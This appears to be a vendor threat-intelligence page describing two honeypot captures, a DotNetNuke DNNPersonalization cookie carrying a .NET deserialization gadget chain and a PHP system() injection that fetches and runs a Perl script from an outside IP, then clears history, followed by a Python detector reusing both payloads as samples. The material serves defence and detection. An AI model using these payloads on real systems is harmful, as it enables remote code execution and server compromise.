Advanced Threat Detection in Phishing Email Attachments
by CloudCoffer
Honeypot Extraction - Windows .NET Framework

Date of Detection: 2017.12.11
Source IP Addresses: 173.212.217.181, 149.255.35.91
Attack Raw Pattern: DNNPersonalization=<profile><item key="key" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfObjectStateFormatterObjectDataProvider> <ProjectedProperty0> <ObjectInstance p3:type="ObjectStateFormatter" xmlns:p3="http://www.w3.org/2001/XMLSchema-instance" /> <MethodName>Deserialize</MethodName> <MethodParameters> <anyType xmlns:q1="http://www.w3.org/2001/XMLSchema" p5:type="q1:string" xmlns:p5="http://www.w3.org/2001/XMLSchema-instance">[…]</anyType> </MethodParameters> </ProjectedProperty0> </ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>;
Target System: Windows with .NET Framework
Malicious File Path from the […]

What it does: the DNNPersonalization cookie value is an XML profile that the server deserializes, and this one carries a .NET gadget chain instead of user settings. The item type names ExpandedWrapper wrapping an ObjectDataProvider; the ObjectInstance is an ObjectStateFormatter, the MethodName is Deserialize, and the MethodParameters string (the serialized payload, elided above) is therefore passed to ObjectStateFormatter.Deserialize, so the server ends up deserializing attacker-controlled data.
Honeypot Extraction - Command Injection

Date of Detection: 2017.11.20
Source IP Addresses: 27.255.77.103
Attack Raw Pattern: after URL decoding, the pattern is as follows.
<? system("cd /tmp ; wget http://175.126.167.52/apache.txt ; curl -O http://175.126.167.52/apache.txt ; fetch http://175.126.167.52/apache.txt ; chmod +x apache.txt ; perl apache.txt ; rm -rf apache.txt ; history -c "); ?>
Malicious File Path from the […]

What it does: the injected PHP calls system() with a shell chain that changes to /tmp, tries wget, curl and fetch in turn so the download succeeds on Linux and BSD hosts alike, runs the downloaded apache.txt as a Perl script (the .txt name and the chmod +x are cosmetic, since perl reads the file directly), then deletes the file and clears the shell history.
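Both captures above can be matched with the same decode-then-inspect logic: parse the Cookie header for a DNNPersonalization value that names the ExpandedWrapper/ObjectDataProvider gadget and calls ObjectStateFormatter.Deserialize, and URL-decode query parameters (repeatedly, since attackers double-encode) to find a PHP system() download-and-execute chain. The Python below is an added example written for this page, not CloudCoffer's detection code. The sample requests are constructed: the parameter names (tabid, page), the language cookie, the abbreviated gadget XML (assembly versions and xmlns declarations dropped) and the BASE64_PLACEHOLDER standing in for the serialized payload the page elides are all assumptions.

```python
import re
from urllib.parse import quote, unquote, unquote_plus

# DNNPersonalization capture: an XML <profile> whose <item type="..."> names the
# ExpandedWrapper/ObjectDataProvider gadget and invokes ObjectStateFormatter.Deserialize.
DNN_COOKIE_NAME = "DNNPersonalization"
DNN_GADGET_MARKERS = ("System.Data.Services.Internal.ExpandedWrapper",
                      "System.Windows.Data.ObjectDataProvider", "ObjectStateFormatter")
DNN_ITEM_TYPE_RE = re.compile(r"<item\b[^>]*\btype=", re.I)
DNN_DESERIALIZE_RE = re.compile(r"<MethodName>\s*Deserialize\s*</MethodName>", re.I)

# Command-injection capture: URL-encoded PHP calling system() with a download,
# execute and clean-up chain.
PHP_EXEC_RE = re.compile(r"<\?(?:php)?\s*(?:system|exec|shell_exec|passthru)\s*\(", re.I)
DOWNLOADERS = ("wget ", "curl ", "fetch ")
INTERPRETER_RE = re.compile(r"\b(?:perl|python|sh|bash)\s+\S+")
ANTI_FORENSICS = ("history -c", "rm -rf")

def parse_cookie_header(header):
    """Split a Cookie header into name -> raw (still URL-encoded) value."""
    cookies = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies

def detect_dnn_deserialization(cookie_header):
    """Indicator names found in the DNNPersonalization cookie ([] if none)."""
    raw = parse_cookie_header(cookie_header).get(DNN_COOKIE_NAME)
    if raw is None:
        return []
    value = unquote_plus(raw)
    hits = []
    if DNN_ITEM_TYPE_RE.search(value) and any(m in value for m in DNN_GADGET_MARKERS):
        hits.append("dnn_gadget_type")
    if DNN_DESERIALIZE_RE.search(value):
        hits.append("dnn_objectdataprovider_deserialize")
    return hits

def fully_decode(text, rounds=3):
    """Form-decode once ('+' is a space), then keep %XX-decoding so double-encoded
    payloads are inspected without turning a literal '+' (as in chmod +x) into a space."""
    decoded = unquote_plus(text)
    for _ in range(rounds - 1):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    return decoded

def detect_command_injection(query_string):
    """Indicator names found in the decoded query string ([] if none)."""
    decoded = fully_decode(query_string)
    hits = []
    if PHP_EXEC_RE.search(decoded):
        hits.append("php_exec_call")
    if any(d in decoded for d in DOWNLOADERS) and INTERPRETER_RE.search(decoded):
        hits.append("download_and_execute")
    if any(a in decoded for a in ANTI_FORENSICS):
        hits.append("anti_forensics")
    return hits

def classify_request(request):
    """request = {"query": str, "headers": {name: value}} -> (verdict, hits)."""
    hits = detect_dnn_deserialization(request.get("headers", {}).get("Cookie", ""))
    hits += detect_command_injection(request.get("query", ""))
    if any(h.startswith("dnn_") for h in hits):
        return "dnn-deserialization", hits
    if "php_exec_call" in hits or "download_and_execute" in hits:
        return "command-injection", hits
    return "clean", hits

# Constructed samples (not the honeypot's captures): gadget XML abbreviated,
# BASE64_PLACEHOLDER stands in for the serialized payload the page elides.
DNN_PAYLOAD = (
    '<profile><item key="key" type="System.Data.Services.Internal.ExpandedWrapper`2'
    '[[System.Web.UI.ObjectStateFormatter, System.Web],'
    '[System.Windows.Data.ObjectDataProvider, PresentationFramework]], System.Data.Services">'
    '<ExpandedWrapperOfObjectStateFormatterObjectDataProvider><ProjectedProperty0>'
    '<ObjectInstance p3:type="ObjectStateFormatter" /><MethodName>Deserialize</MethodName>'
    '<MethodParameters><anyType p5:type="q1:string">BASE64_PLACEHOLDER</anyType>'
    '</MethodParameters></ProjectedProperty0>'
    '</ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>')
CMDI_PAYLOAD = ('<? system("cd /tmp ; wget http://175.126.167.52/apache.txt ; '
                'curl -O http://175.126.167.52/apache.txt ; fetch http://175.126.167.52/apache.txt ; '
                'chmod +x apache.txt ; perl apache.txt ; rm -rf apache.txt ; history -c "); ?>')
SAMPLES = {
    "dnn": {"query": "tabid=1",
            "headers": {"Cookie": "language=en-US; DNNPersonalization=" + quote(DNN_PAYLOAD)}},
    "cmdi": {"query": "page=" + quote(CMDI_PAYLOAD), "headers": {}},
    "benign": {"query": "tabid=1", "headers": {"Cookie": "DNNPersonalization=" + quote(
        '<profile><item key="UserMode" type="System.String">View</item></profile>')}},
}

if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(name, *classify_request(req))
```

The benign sample matters as much as the two attacks: a normal DNNPersonalization cookie is also an XML profile with typed items, so the detector keys on the gadget type names and the Deserialize call rather than on the presence of the cookie or of XML. Likewise the command-injection check requires the PHP exec call or a download-plus-interpreter pair, not just a URL that mentions wget.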